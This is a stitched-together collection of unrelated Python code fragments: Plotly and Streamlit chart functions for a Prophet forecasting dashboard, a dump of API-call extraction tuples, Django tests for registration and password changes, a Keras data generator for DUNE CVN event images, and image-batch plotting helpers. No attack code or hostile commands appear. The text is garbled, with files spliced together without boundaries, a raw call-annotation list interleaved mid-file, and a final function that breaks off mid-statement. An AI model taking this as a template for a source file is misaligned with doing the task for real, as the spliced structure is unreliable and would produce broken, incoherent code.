        yaxis_zerolinewidth=1,
        yaxis_rangemode="tozero",
        height=500,
        width=800,
    )
    return fig
def plot_detailed_metrics(
    metrics_df: pd.DataFrame,
    perf: Dict[Any, Any],
    eval: Dict[Any, Any],
    use_cv: bool,
    style: Dict[Any, Any],
    report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
    """Show per-granularity performance: bar subplots when values vary, else a table.

    Parameters
    ----------
    metrics_df : pd.DataFrame
        Performance per metric at the desired granularity (table fallback).
    perf : Dict
        Per-metric dataframes of performance at the desired granularity.
    eval : Dict
        Evaluation specifications (evaluation set, selected metrics, granularity).
    use_cv : bool
        Whether or not cross-validation is used.
    style : Dict
        Style specifications for the graph (colors).
    report: List[Dict[str, Any]]
        List of all report components.

    Returns
    -------
    List[Dict[str, Any]]
        The report list, with the bar-chart figure appended when one was drawn.
    """
    granularity = eval["granularity"]
    # Only plot metrics whose values actually vary at this granularity.
    metrics = [m for m in perf if perf[m][granularity].nunique() > 1]
    if not metrics:
        # Nothing varies: a plain table is more informative than flat bars.
        st.dataframe(metrics_df)
        return report
    # Two charts per row.
    n_rows = len(metrics) // 2 + len(metrics) % 2
    fig = make_subplots(rows=n_rows, cols=2, subplot_titles=metrics)
    palette = style["colors"]
    for i, metric in enumerate(metrics):
        values = perf[metric]
        if use_cv:
            bar_colors = palette
        else:
            # Single uniform color per subplot, cycling through the palette.
            bar_colors = [palette[i % len(palette)]] * values[granularity].nunique()
        bar = go.Bar(x=values[granularity], y=values[metric], marker_color=bar_colors)
        fig.append_trace(bar, row=i // 2 + 1, col=i % 2 + 1)
    fig.update_layout(height=300 * n_rows, width=1000, showlegend=False)
    st.plotly_chart(fig)
    report.append({"object": fig, "name": "eval_detailed_performance", "type": "plot"})
    return report
def make_separate_components_plot(
    model: Prophet,
    forecast_df: pd.DataFrame,
    target_col: str,
    cleaning: Dict[Any, Any],
    resampling: Dict[Any, Any],
    style: Dict[Any, Any],
) -> go.Figure:
    """Creates plotly area charts with the components of the prediction, each one on its own subplot.

    Parameters
    ----------
    model : Prophet
        Fitted model.
    forecast_df : pd.DataFrame
        Predictions of Prophet model.
    target_col : str
        Name of target column.
    cleaning : Dict
        Cleaning specifications.
    resampling : Dict
        Resampling specifications (granularity, dataset frequency).
    style : Dict
        Style specifications for the graph (colors).

    Returns
    -------
    go.Figure
        Plotly area charts with the components of the prediction, each one on its own subplot.
    """
    components = get_forecast_components(model, forecast_df)
    features = components.columns
    n_features = len(components.columns)
    # One stacked subplot per component.
    fig = make_subplots(rows=n_features, cols=1, subplot_titles=features)
    for i, col in enumerate(features):
        # Periodic components are re-indexed onto one representative cycle
        # (hour of day / day of week / day of month / day of year); any other
        # component (e.g. trend) is plotted on the component index as-is.
        if col == "daily":
            # One representative timestamp per hour of day, ordered 00h -> 23h.
            hours = forecast_df["ds"].groupby(forecast_df.ds.dt.hour).last()
            values = forecast_df.loc[forecast_df.ds.isin(hours), ("ds", col)]
            values = values.iloc[values.ds.dt.hour.values.argsort()]  # sort by hour order
            y = values[col]
            x = values.ds.map(lambda h: h.strftime("%H:%M"))
        elif col == "weekly":
            # One representative timestamp per weekday, ordered Mon -> Sun.
            days = forecast_df["ds"].groupby(forecast_df.ds.dt.dayofweek).last()
            values = forecast_df.loc[forecast_df.ds.isin(days), ("ds", col)]
            values = values.iloc[
                values.ds.dt.dayofweek.values.argsort()
            ]  # sort by day of week order
            y = values[col]
            x = values.ds.dt.day_name()
        elif col == "monthly":
            # One representative timestamp per day of month, ordered 1 -> 31.
            days = forecast_df["ds"].groupby(forecast_df.ds.dt.day).last()
            values = forecast_df.loc[forecast_df.ds.isin(days), ("ds", col)]
            values = values.iloc[values.ds.dt.day.values.argsort()]  # sort by day of month order
            y = values[col]
            x = values.ds.dt.day
        elif col == "yearly":
            # Sample the previous full calendar year so the x axis spans Jan-Dec.
            year = forecast_df["ds"].max().year - 1
            days = pd.date_range(start=f"{year}-01-01", end=f"{year}-12-31")
            y = forecast_df.loc[forecast_df["ds"].isin(days), col]
            x = days.dayofyear
        else:
            x = components.index
            y = components[col]
        fig.append_trace(
            go.Scatter(
                x=x,
                y=y,
                fill="tozeroy",
                name=col,
                mode="lines",
                line=dict(color=style["colors"][i % len(style["colors"])]),
            ),
            row=i + 1,
            col=1,
        )
        # NOTE(review): y_label is loop-invariant and could be hoisted above the loop.
        y_label = f"log {target_col}" if cleaning["log_transform"] else target_col
        fig.update_yaxes(title_text=f"{y_label} / {resampling['freq']}", row=i + 1, col=1)
        fig.update_xaxes(showgrid=False)
        if col == "yearly":
            # Bimonthly tick positions expressed as day-of-year.
            fig["layout"][f"xaxis{i + 1}"].update(
                tickmode="array",
                tickvals=[1, 61, 122, 183, 244, 305],
                ticktext=["Jan", "Mar", "May", "Jul", "Sep", "Nov"],
            )
    fig.update_layout(height=200 * n_features if n_features > 1 else 300, width=800)
    return fig
def make_waterfall_components_plot(
    model: Prophet,
    forecast_df: pd.DataFrame,
    start_date: datetime.date,
    end_date: datetime.date,
    target_col: str,
    cleaning: Dict[Any, Any],
    resampling: Dict[Any, Any],
    style: Dict[Any, Any],
    df: pd.DataFrame,
) -> go.Figure:
    """Creates a waterfall chart with the components of the prediction.

    Parameters
    ----------
    model : Prophet
        Fitted model.
    forecast_df : pd.DataFrame
        Predictions of Prophet model.
    start_date : datetime.date
        Start date for components computation.
    end_date : datetime.date
        End date for components computation.
    target_col : str
        Name of target column.
    cleaning : Dict
        Cleaning specifications.
    resampling : Dict
        Resampling specifications (granularity, dataset frequency).
    style : Dict
        Style specifications for the graph (colors).
    df: pd.DataFrame
        Dataframe containing the ground truth.

    Returns
    -------
    go.Figure
        Waterfall chart with the components of prediction.
    """
    # Number of decimals shown in the bar labels.
    N_digits = style["waterfall_digits"]
    components = get_forecast_components(model, forecast_df, True).reset_index()
    # Per-component contributions over the selected window, last entry being
    # the forecast total (see prepare_waterfall).
    waterfall = prepare_waterfall(components, start_date, end_date)
    # Mean observed value over [start_date, end_date), shown in parentheses
    # next to the forecast total in the final bar's label.
    truth = df.loc[
        (df["ds"] >= pd.to_datetime(start_date)) & (df["ds"] < pd.to_datetime(end_date)), "y"
    ].mean(axis=0)
    fig = go.Figure(
        go.Waterfall(
            orientation="v",
            # Every bar is a relative contribution except the last (the total).
            measure=["relative"] * (len(waterfall) - 1) + ["total"],
            x=[x.capitalize() for x in list(waterfall.index)[:-1] + ["Forecast (Truth)"]],
            y=list(waterfall.values),
            textposition="auto",
            # Signed labels for contributions ("+x" when positive); the total
            # bar shows "forecast (truth)".
            text=[
                "+" + str(round(x, N_digits)) if x > 0 else "" + str(round(x, N_digits))
                for x in list(waterfall.values)[:-1]
            ]
            + [f"{round(waterfall.values[-1], N_digits)} ({round(truth, N_digits)})"],
            decreasing={"marker": {"color": style["colors"][1]}},
            increasing={"marker": {"color": style["colors"][0]}},
            totals={"marker": {"color": style["colors"][2]}},
        )
    )
    y_label = f"log {target_col}" if cleaning["log_transform"] else target_col
    fig.update_yaxes(title_text=f"{y_label} / {resampling['freq']}")
    fig.update_layout(
        title=f"Forecast decomposition "
        f"(from {start_date.strftime('%Y-%m-%d')} to {end_date.strftime('%Y-%m-%d')})",
        title_x=0.2,
        width=800,
    )
    return fig
def display_global_metrics(
    evaluation_df: pd.DataFrame,
    eval: Dict[Any, Any],
    dates: Dict[Any, Any],
    resampling: Dict[Any, Any],
    use_cv: bool,
    config: Dict[Any, Any],
    report: List[Dict[str, Any]],
) -> List[Dict[str, Any]]:
    """Displays all global metrics.

    Parameters
    ----------
    evaluation_df : pd.DataFrame
        Evaluation dataframe.
    eval : Dict
        Evaluation specifications.
    dates : Dict
        Dictionary containing all dates information.
    resampling : Dict
        Resampling specifications.
    use_cv : bool
        Whether or note cross-validation is used.
    config : Dict
        Lib configuration dictionary.
    report: List[Dict[str, Any]]
        List of all report components.

    Returns
    -------
    List[Dict[str, Any]]
        The report list; the global metrics dataset is appended only when
        cross-validation is not used.
    """
    # Always compute the full metric set at global (or per-cutoff) granularity,
    # regardless of the metrics selected for the deep dive.
    eval_all = {
        "granularity": "cutoff" if use_cv else "Global",
        "metrics": ["RMSE", "MAPE", "MAE", "MSE", "SMAPE"],
        "get_perf_on_agg_forecast": eval["get_perf_on_agg_forecast"],
    }
    metrics_df, _ = get_perf_metrics(evaluation_df, eval_all, dates, resampling, use_cv, config)
    if use_cv:
        # With CV, show one row per cutoff as a table.
        st.dataframe(metrics_df)
    else:
        # One column per metric: a styled header followed by the global value.
        # (Replaces five copy-pasted col1..col5 blocks.)
        for column, metric in zip(st.columns(5), eval_all["metrics"]):
            column.markdown(
                f"<p style='color: {config['style']['colors'][1]}; "
                f"font-weight: bold; font-size: 20px;'> {metric}</p>",
                unsafe_allow_html=True,
            )
            column.write(metrics_df.loc["Global", metric])
        report.append(
            {
                "object": metrics_df.loc["Global"].reset_index(),
                "name": "eval_global_performance",
                "type": "dataset",
            }
        )
    return report
| [
"streamlit_prophet.lib.exposition.expanders.display_expanders_performance",
"pandas.date_range",
"pandas.to_datetime",
"plotly.graph_objects.Bar",
"plotly.express.scatter",
"fbprophet.plot.plot_plotly",
"plotly.express.line",
"plotly.graph_objects.Scatter",
"streamlit.columns",
"plotly.figure_fact... | [((1846, 1908), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""overview"""', '"""More info on this plot"""'], {}), "(readme, 'overview', 'More info on this plot')\n", (1862, 1908), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((2253, 2371), 'fbprophet.plot.plot_plotly', 'plot_plotly', (['model', 'forecast'], {'ylabel': 'target_col', 'changepoints': 'bool_param', 'trend': 'bool_param', 'uncertainty': 'bool_param'}), '(model, forecast, ylabel=target_col, changepoints=bool_param,\n trend=bool_param, uncertainty=bool_param)\n', (2264, 2371), False, 'from fbprophet.plot import plot_plotly\n'), ((2427, 2447), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig'], {}), '(fig)\n', (2442, 2447), True, 'import streamlit as st\n'), ((3733, 3792), 'streamlit_prophet.lib.evaluation.preparation.get_evaluation_df', 'get_evaluation_df', (['datasets', 'forecasts', 'dates', 'eval', 'use_cv'], {}), '(datasets, forecasts, dates, eval, use_cv)\n', (3750, 3792), False, 'from streamlit_prophet.lib.evaluation.preparation import get_evaluation_df\n'), ((3824, 3896), 'streamlit_prophet.lib.evaluation.metrics.get_perf_metrics', 'get_perf_metrics', (['evaluation_df', 'eval', 'dates', 'resampling', 'use_cv', 'config'], {}), '(evaluation_df, eval, dates, resampling, use_cv, config)\n', (3840, 3896), False, 'from streamlit_prophet.lib.evaluation.metrics import get_perf_metrics\n'), ((3915, 3949), 'streamlit.write', 'st.write', (['"""## Performance metrics"""'], {}), "('## Performance metrics')\n", (3923, 3949), True, 'import streamlit as st\n'), ((3954, 4025), 'streamlit_prophet.lib.exposition.expanders.display_expanders_performance', 'display_expanders_performance', (['use_cv', 'dates', 'resampling', 'style', 'readme'], {}), '(use_cv, dates, resampling, style, readme)\n', (3983, 4025), False, 'from streamlit_prophet.lib.exposition.expanders import 
display_expander, display_expanders_performance\n'), ((4030, 4107), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""helper_metrics"""', '"""How to evaluate my model?"""', '(True)'], {}), "(readme, 'helper_metrics', 'How to evaluate my model?', True)\n", (4046, 4107), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((4112, 4146), 'streamlit.write', 'st.write', (['"""### Global performance"""'], {}), "('### Global performance')\n", (4120, 4146), True, 'import streamlit as st\n'), ((4251, 4276), 'streamlit.write', 'st.write', (['"""### Deep dive"""'], {}), "('### Deep dive')\n", (4259, 4276), True, 'import streamlit as st\n'), ((4371, 4400), 'streamlit.write', 'st.write', (['"""## Error analysis"""'], {}), "('## Error analysis')\n", (4379, 4400), True, 'import streamlit as st\n'), ((4405, 4499), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""helper_errors"""', '"""How to troubleshoot forecasting errors?"""', '(True)'], {}), "(readme, 'helper_errors',\n 'How to troubleshoot forecasting errors?', True)\n", (4421, 4499), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((4711, 4732), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig1'], {}), '(fig1)\n', (4726, 4732), True, 'import streamlit as st\n'), ((4737, 4758), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig2'], {}), '(fig2)\n', (4752, 4758), True, 'import streamlit as st\n'), ((4763, 4784), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig3'], {}), '(fig3)\n', (4778, 4784), True, 'import streamlit as st\n'), ((6572, 6600), 'streamlit.write', 'st.write', (['"""## Global impact"""'], {}), "('## Global impact')\n", (6580, 6600), True, 'import streamlit as st\n'), ((6605, 6669), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', 
'"""components"""', '"""More info on this plot"""'], {}), "(readme, 'components', 'More info on this plot')\n", (6621, 6669), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((7176, 7197), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig1'], {}), '(fig1)\n', (7191, 7197), True, 'import streamlit as st\n'), ((7203, 7230), 'streamlit.write', 'st.write', (['"""## Local impact"""'], {}), "('## Local impact')\n", (7211, 7230), True, 'import streamlit as st\n'), ((7235, 7304), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""waterfall"""', '"""More info on this plot"""', '(True)'], {}), "(readme, 'waterfall', 'More info on this plot', True)\n", (7251, 7304), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((7332, 7378), 'streamlit_prophet.lib.inputs.dates.input_waterfall_dates', 'input_waterfall_dates', (['forecast_df', 'resampling'], {}), '(forecast_df, resampling)\n', (7353, 7378), False, 'from streamlit_prophet.lib.inputs.dates import input_waterfall_dates\n'), ((7526, 7547), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig2'], {}), '(fig2)\n', (7541, 7547), True, 'import streamlit as st\n'), ((8651, 8711), 'streamlit_prophet.lib.exposition.expanders.display_expander', 'display_expander', (['readme', '"""future"""', '"""More info on this plot"""'], {}), "(readme, 'future', 'More info on this plot')\n", (8667, 8711), False, 'from streamlit_prophet.lib.exposition.expanders import display_expander, display_expanders_performance\n'), ((8784, 8924), 'fbprophet.plot.plot_plotly', 'plot_plotly', (["models['future']", "forecasts['future']"], {'ylabel': 'target_col', 'changepoints': 'bool_param', 'trend': 'bool_param', 'uncertainty': 'bool_param'}), "(models['future'], forecasts['future'], ylabel=target_col,\n changepoints=bool_param, trend=bool_param, uncertainty=bool_param)\n", (8795, 
8924), False, 'from fbprophet.plot import plot_plotly\n'), ((9074, 9094), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig'], {}), '(fig)\n', (9089, 9094), True, 'import streamlit as st\n'), ((14705, 14774), 'plotly.figure_factory.create_distplot', 'ff.create_distplot', (['residuals', 'labels'], {'show_hist': '(False)', 'colors': 'colors'}), '(residuals, labels, show_hist=False, colors=colors)\n', (14723, 14774), True, 'import plotly.figure_factory as ff\n'), ((18139, 18182), 'streamlit_prophet.lib.exposition.preparation.get_forecast_components', 'get_forecast_components', (['model', 'forecast_df'], {}), '(model, forecast_df)\n', (18162, 18182), False, 'from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall\n'), ((18268, 18331), 'plotly.subplots.make_subplots', 'make_subplots', ([], {'rows': 'n_features', 'cols': '(1)', 'subplot_titles': 'features'}), '(rows=n_features, cols=1, subplot_titles=features)\n', (18281, 18331), False, 'from plotly.subplots import make_subplots\n'), ((21929, 21980), 'streamlit_prophet.lib.exposition.preparation.prepare_waterfall', 'prepare_waterfall', (['components', 'start_date', 'end_date'], {}), '(components, start_date, end_date)\n', (21946, 21980), False, 'from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall\n'), ((24247, 24323), 'streamlit_prophet.lib.evaluation.metrics.get_perf_metrics', 'get_perf_metrics', (['evaluation_df', 'eval_all', 'dates', 'resampling', 'use_cv', 'config'], {}), '(evaluation_df, eval_all, dates, resampling, use_cv, config)\n', (24263, 24323), False, 'from streamlit_prophet.lib.evaluation.metrics import get_perf_metrics\n'), ((10017, 10105), 'plotly.express.line', 'px.line', (['eval_df'], {'x': '"""ds"""', 'y': '"""forecast"""', 'color': '"""Fold"""', 'color_discrete_sequence': 'colors'}), "(eval_df, x='ds', y='forecast', color='Fold',\n color_discrete_sequence=colors)\n", (10024, 10105), True, 'import 
plotly.express as px\n'), ((10479, 10643), 'plotly.express.line', 'px.line', (['eval_df'], {'x': '"""ds"""', 'y': "['truth', 'forecast']", 'color_discrete_sequence': "style['colors'][1:]", 'hover_data': "{'variable': True, 'value': ':.4f', 'ds': False}"}), "(eval_df, x='ds', y=['truth', 'forecast'], color_discrete_sequence=\n style['colors'][1:], hover_data={'variable': True, 'value': ':.4f',\n 'ds': False})\n", (10486, 10643), True, 'import plotly.express as px\n'), ((12412, 12587), 'plotly.express.scatter', 'px.scatter', (['eval_df'], {'x': '"""truth"""', 'y': '"""forecast"""', 'color': '"""Fold"""', 'opacity': '(0.5)', 'color_discrete_sequence': 'colors', 'hover_data': "{'date': True, 'truth': ':.4f', 'forecast': ':.4f'}"}), "(eval_df, x='truth', y='forecast', color='Fold', opacity=0.5,\n color_discrete_sequence=colors, hover_data={'date': True, 'truth':\n ':.4f', 'forecast': ':.4f'})\n", (12422, 12587), True, 'import plotly.express as px\n'), ((12699, 12873), 'plotly.express.scatter', 'px.scatter', (['eval_df'], {'x': '"""truth"""', 'y': '"""forecast"""', 'opacity': '(0.5)', 'color_discrete_sequence': "style['colors'][2:]", 'hover_data': "{'date': True, 'truth': ':.4f', 'forecast': ':.4f'}"}), "(eval_df, x='truth', y='forecast', opacity=0.5,\n color_discrete_sequence=style['colors'][2:], hover_data={'date': True,\n 'truth': ':.4f', 'forecast': ':.4f'})\n", (12709, 12873), True, 'import plotly.express as px\n'), ((14462, 14493), 'pandas.Series', 'pd.Series', (["eval_df['residuals']"], {}), "(eval_df['residuals'])\n", (14471, 14493), True, 'import pandas as pd\n'), ((17083, 17103), 'streamlit.plotly_chart', 'st.plotly_chart', (['fig'], {}), '(fig)\n', (17098, 17103), True, 'import streamlit as st\n'), ((17214, 17238), 'streamlit.dataframe', 'st.dataframe', (['metrics_df'], {}), '(metrics_df)\n', (17226, 17238), True, 'import streamlit as st\n'), ((24347, 24371), 'streamlit.dataframe', 'st.dataframe', (['metrics_df'], {}), '(metrics_df)\n', (24359, 24371), True, 
'import streamlit as st\n'), ((24421, 24434), 'streamlit.columns', 'st.columns', (['(5)'], {}), '(5)\n', (24431, 24434), True, 'import streamlit as st\n'), ((10208, 10353), 'plotly.graph_objects.Scatter', 'go.Scatter', ([], {'x': "eval_df['ds']", 'y': "eval_df['truth']", 'name': '"""Truth"""', 'mode': '"""lines"""', 'line': "{'color': style['color_axis'], 'dash': 'dot', 'width': 1.5}"}), "(x=eval_df['ds'], y=eval_df['truth'], name='Truth', mode='lines',\n line={'color': style['color_axis'], 'dash': 'dot', 'width': 1.5})\n", (10218, 10353), True, 'import plotly.graph_objects as go\n'), ((16728, 16820), 'plotly.graph_objects.Bar', 'go.Bar', ([], {'x': "perf[metric][eval['granularity']]", 'y': 'perf[metric][metric]', 'marker_color': 'colors'}), "(x=perf[metric][eval['granularity']], y=perf[metric][metric],\n marker_color=colors)\n", (16734, 16820), True, 'import plotly.graph_objects as go\n'), ((21849, 21898), 'streamlit_prophet.lib.exposition.preparation.get_forecast_components', 'get_forecast_components', (['model', 'forecast_df', '(True)'], {}), '(model, forecast_df, True)\n', (21872, 21898), False, 'from streamlit_prophet.lib.exposition.preparation import get_forecast_components, prepare_waterfall\n'), ((19565, 19622), 'pandas.date_range', 'pd.date_range', ([], {'start': 'f"""{year}-01-01"""', 'end': 'f"""{year}-12-31"""'}), "(start=f'{year}-01-01', end=f'{year}-12-31')\n", (19578, 19622), True, 'import pandas as pd\n'), ((22022, 22048), 'pandas.to_datetime', 'pd.to_datetime', (['start_date'], {}), '(start_date)\n', (22036, 22048), True, 'import pandas as pd\n'), ((22064, 22088), 'pandas.to_datetime', 'pd.to_datetime', (['end_date'], {}), '(end_date)\n', (22078, 22088), True, 'import pandas as pd\n')] |
from django.test import Client
from django.test import TestCase
from django.urls import reverse
from django.contrib.auth import get_user_model
from model_mommy import mommy
from django.conf import settings
# Resolve the project's active user model once (honours a custom AUTH_USER_MODEL).
User = get_user_model()
class RegisterViewTestCase(TestCase):
    """Exercises the account registration view."""

    def setUp(self):
        self.client = Client()
        self.register_url = reverse('accounts:register')

    def test_register_ok(self):
        # A valid submission redirects to login and creates exactly one user.
        payload = {
            'username': 'jhowuserteste',
            'email': '<EMAIL>',
            'password1': '<PASSWORD>',
            'password2': '<PASSWORD>',
        }
        response = self.client.post(self.register_url, payload)
        self.assertRedirects(response, reverse('login'))
        self.assertEquals(User.objects.count(), 1)

    def test_register_fail(self):
        # Omitting the e-mail must produce a form validation error.
        payload = {
            'username': 'jhowuserteste',
            'password1': '<PASSWORD>',
            'password2': '<PASSWORD>',
        }
        response = self.client.post(self.register_url, payload)
        self.assertFormError(response, 'form', 'email', 'Este campo é obrigatório.')
class UpdateUserTestCase(TestCase):
    """Exercises the profile update view."""

    def setUp(self):
        self.client = Client()
        self.url = reverse('accounts:update_user')
        self.user = mommy.prepare(settings.AUTH_USER_MODEL)
        self.user.set_password('<PASSWORD>')
        self.user.save()

    def tearDown(self):
        self.user.delete()

    def test_update_user_ok(self):
        payload = {'name': 'humbree', 'email': '<EMAIL>'}
        # Anonymous access is redirected away from the view.
        response = self.client.get(self.url)
        self.assertEquals(response.status_code, 302)
        # An authenticated update redirects to the account index...
        self.client.login(username=self.user.username, password='<PASSWORD>')
        response = self.client.post(self.url, payload)
        self.assertRedirects(response, reverse('accounts:index'))
        # ...and the new values are persisted.
        self.user.refresh_from_db()
        self.assertEquals(self.user.email, '<EMAIL>')
        self.assertEquals(self.user.name, 'humbree')

    def test_update_user_error(self):
        # An empty submission must flag the missing e-mail field.
        self.client.login(username=self.user.username, password='<PASSWORD>')
        response = self.client.post(self.url, {})
        self.assertFormError(response, 'form', 'email', 'Este campo é obrigatório.')
class UpdatePasswordTestCase(TestCase):
    """Exercises the password change view."""

    def setUp(self):
        self.client = Client()
        self.url = reverse('accounts:update_password')
        self.user = mommy.prepare(settings.AUTH_USER_MODEL)
        self.user.set_password('<PASSWORD>')
        self.user.save()

    def tearDown(self):
        self.user.delete()

    def test_update_password_ok(self):
        payload = {
            'old_password': '<PASSWORD>',
            'new_password1': '<PASSWORD>',
            'new_password2': '<PASSWORD>',
        }
        self.client.login(username=self.user.username, password='<PASSWORD>')
        self.client.post(self.url, payload)
        # The new password must be active on the reloaded user.
        self.user.refresh_from_db()
        self.assertTrue(self.user.check_password('<PASSWORD>'))
| [
"django.urls.reverse",
"django.contrib.auth.get_user_model",
"model_mommy.mommy.prepare",
"django.test.Client"
] | [((214, 230), 'django.contrib.auth.get_user_model', 'get_user_model', ([], {}), '()\n', (228, 230), False, 'from django.contrib.auth import get_user_model\n'), ((313, 321), 'django.test.Client', 'Client', ([], {}), '()\n', (319, 321), False, 'from django.test import Client\n'), ((350, 378), 'django.urls.reverse', 'reverse', (['"""accounts:register"""'], {}), "('accounts:register')\n", (357, 378), False, 'from django.urls import reverse\n'), ((647, 663), 'django.urls.reverse', 'reverse', (['"""login"""'], {}), "('login')\n", (654, 663), False, 'from django.urls import reverse\n'), ((1164, 1172), 'django.test.Client', 'Client', ([], {}), '()\n', (1170, 1172), False, 'from django.test import Client\n'), ((1192, 1223), 'django.urls.reverse', 'reverse', (['"""accounts:update_user"""'], {}), "('accounts:update_user')\n", (1199, 1223), False, 'from django.urls import reverse\n'), ((1244, 1283), 'model_mommy.mommy.prepare', 'mommy.prepare', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (1257, 1283), False, 'from model_mommy import mommy\n'), ((1753, 1778), 'django.urls.reverse', 'reverse', (['"""accounts:index"""'], {}), "('accounts:index')\n", (1760, 1778), False, 'from django.urls import reverse\n'), ((2402, 2410), 'django.test.Client', 'Client', ([], {}), '()\n', (2408, 2410), False, 'from django.test import Client\n'), ((2430, 2465), 'django.urls.reverse', 'reverse', (['"""accounts:update_password"""'], {}), "('accounts:update_password')\n", (2437, 2465), False, 'from django.urls import reverse\n'), ((2486, 2525), 'model_mommy.mommy.prepare', 'mommy.prepare', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (2499, 2525), False, 'from model_mommy import mommy\n')] |
"""
DUNE CVN generator module.
"""
__version__ = '1.0'
__author__ = '<NAME>, <NAME>'
__email__ = "<EMAIL>, <EMAIL>"
import numpy as np
import zlib
class DataGenerator(object):
    '''Generate batches of event images for tf.keras.

    Events are stored on disk as zlib-compressed uint8 pixel arrays,
    one file per event, named ``event<ID>.gz`` under ``images_path``.
    '''

    def __init__(self, cells=500, planes=500, views=3, batch_size=32,
                 images_path='dataset', shuffle=True, test_values=None):
        ''' Constructor.
        Args:
            cells: image cells.
            planes: image planes.
            views: number of views.
            batch_size: batch size.
            images_path: directory containing the compressed event files.
            shuffle: shuffle the events each epoch.
            test_values: optional list to be filled with test values
                (a fresh list is created when omitted).
        '''
        self.cells = cells
        self.planes = planes
        self.views = views
        self.batch_size = batch_size
        self.images_path = images_path
        self.shuffle = shuffle
        # Avoid the shared-mutable-default pitfall while keeping the old
        # call signature working for callers that pass their own list.
        self.test_values = [] if test_values is None else test_values

    def generate(self, labels, list_IDs):
        ''' Generates batches of samples, looping forever.
        Args:
            labels: event labels (mapping of event ID -> label).
            list_IDs: event IDs within partition.
        Yields: a batch of events.
        '''
        while True:
            # generate a new random order each epoch so epochs differ
            indexes = self.get_exploration_order(list_IDs)
            imax = len(indexes) // self.batch_size  # number of full batches
            for i in range(imax):
                # IDs belonging to this batch
                batch_ids = [list_IDs[k]
                             for k in indexes[i * self.batch_size:
                                              (i + 1) * self.batch_size]]
                yield self.data_generation(labels, batch_ids)

    def get_exploration_order(self, list_IDs):
        ''' Generates order of exploration.
        Args:
            list_IDs: event IDs within partition.
        Returns: (possibly shuffled) array of indices into list_IDs.
        '''
        indexes = np.arange(len(list_IDs))
        if self.shuffle:
            np.random.shuffle(indexes)
        return indexes

    def data_generation(self, labels, list_IDs_temp):
        ''' Generates data of batch_size samples.
        Args:
            labels: event labels (mapping of event ID -> label).
            list_IDs_temp: event IDs of this batch.
        Returns: one array of shape (batch_size, planes, cells, 1) per view.
        '''
        X = [np.empty((self.batch_size, self.planes, self.cells, 1),
                      dtype='float32') for _ in range(self.views)]
        for i, ID in enumerate(list_IDs_temp):
            # decompress the stored event into a pixel numpy array;
            # BUGFIX: honour self.images_path instead of a hard-coded
            # 'dataset' directory, and use np.frombuffer instead of the
            # deprecated np.fromstring.
            path = '{0}/event{1}.gz'.format(self.images_path, ID)
            with open(path, 'rb') as image_file:
                pixels = np.frombuffer(zlib.decompress(image_file.read()),
                                      dtype=np.uint8)
            pixels = pixels.reshape(self.views, self.planes, self.cells)
            # store volume, one slice per view
            for view in range(self.views):
                X[view][i, :, :, :] = pixels[view, :, :].reshape(
                    self.planes, self.cells, 1)
            # record the actual y label for later evaluation
            y_value = labels[ID]
            self.test_values.append(y_value)
        return X
| [
"numpy.empty",
"numpy.random.shuffle"
] | [((2123, 2149), 'numpy.random.shuffle', 'np.random.shuffle', (['indexes'], {}), '(indexes)\n', (2140, 2149), True, 'import numpy as np\n'), ((2517, 2589), 'numpy.empty', 'np.empty', (['(self.batch_size, self.planes, self.cells, 1)'], {'dtype': '"""float32"""'}), "((self.batch_size, self.planes, self.cells, 1), dtype='float32')\n", (2525, 2589), True, 'import numpy as np\n')] |
import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
def show_batch(ds: tf.data.Dataset,
               classes: list,
               rescale: bool = False,
               size: tuple = (10, 10),
               title: str = None):
    """
    Function to show a batch of images including labels from tf.data object
    Args:
        ds: a (batched) tf.data.Dataset
        classes: a list of all classes (in order of one-hot-encoding)
        rescale: boolean whether to multiply image values by 255
        size: tuple giving plot size
        title: plot title
    Returns:
        matplotlib.pyplot
    """
    plt.figure(figsize=size)
    # Take one batch from dataset and iterate over image-label-combination
    for image, label in ds.take(1):
        image_array = image.numpy()
        # Undo the scaling done in preprocess_input for plotting
        image_array += 1.0
        image_array /= 2.0
        label_array = label.numpy()
        batch_size = image_array.shape[0]
        # BUGFIX: plt.subplot requires integer row/column counts; np.ceil
        # returns a float, which recent matplotlib versions reject.
        n_rows = int(np.ceil(batch_size / 4))
        for idx in range(batch_size):
            label = classes[np.argmax(label_array[idx])]
            ax = plt.subplot(n_rows, 4, idx + 1)
            if rescale:
                plt.imshow(image_array[idx] * 255)
            else:
                plt.imshow(image_array[idx])
            plt.title(label + ' ' + str(image_array[idx].shape), fontsize=10)
            plt.axis('off')
    if title is not None:
        plt.suptitle(title)
    plt.tight_layout(rect=[0, 0.03, 1, 0.95])
    plt.show()
def create_target_list(files: list, target: str = 'make') -> list:
    """Derive the unique target classes encoded in file names.

    File names are expected to carry underscore-separated fields,
    ``<make>_<model>_...``.

    Args:
        files: a list of file names
        target: either 'model' or 'make'
    Returns:
        list of unique classes
    Raises:
        ValueError: if target is neither 'make' nor 'model'
    """
    if target not in ('make', 'model'):
        raise ValueError('target must be either "make" or "model"')
    if target == 'make':
        unique = {name.split('_')[0] for name in files}
    else:
